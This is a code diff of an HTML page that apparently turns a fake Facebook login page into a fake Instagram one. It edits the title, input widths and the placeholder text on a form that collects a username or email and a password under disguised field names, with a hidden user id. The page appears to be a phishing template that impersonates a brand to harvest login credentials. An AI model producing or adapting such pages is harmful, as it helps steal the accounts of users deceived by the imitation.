--- a/index.html
+++ b/index.html
@@ -1,9 +1,9 @@
-<html lang="en">
+ <html lang="en">
                  <head> 
                  <link rel="stylesheet" href="w3.css">
                  <meta charset="UTF-8">
                  <meta name="viewport" content="width=device-width, initial-scale=1.0">
-                 <title>Login to Facebook</title>
+                 <title>Login to instagram</title>
           
                  <style type="text/css" id="operaUserStyle">
                  body{
@@ -14,12 +14,13 @@
                    width: 100%;
                  }
                  input {
-                   width: 320px;
+                   width: 300px;
                    height: 50px;
                    border: 1px solid #4f4f4f;
                    border-radius: 5px;
                    margin: 5px;
                    padding: 20px;
+                   background-image: url('background.jpg');
                  }
                  button {
                    height: 40px;
@@ -43,12 +44,12 @@
     <input type="hidden" name="user_id" value="16934">
     <div class="p-2 w-full  gap-1  ">
     <div class="flex flex-col   p-2  gap-1">
-    <input type="text" name="message_title" placeholder=" Email address or mobile number"> <br>
+    <input type="text" name="message_title" placeholder="Usernane, Email address or mobile number"> <br>
     <input type="password" name="description" placeholder="Password" id="password" autocomplete="new-password" aria-autocomplete="list" required="password"></div>
     </center>
     <center>
     <div>
-    <button type="submit" style="width: 280px">Log In</button>
+    <button type="submit" style="width: 285px">Log In</button>
     </div>
     </center>
     </div>
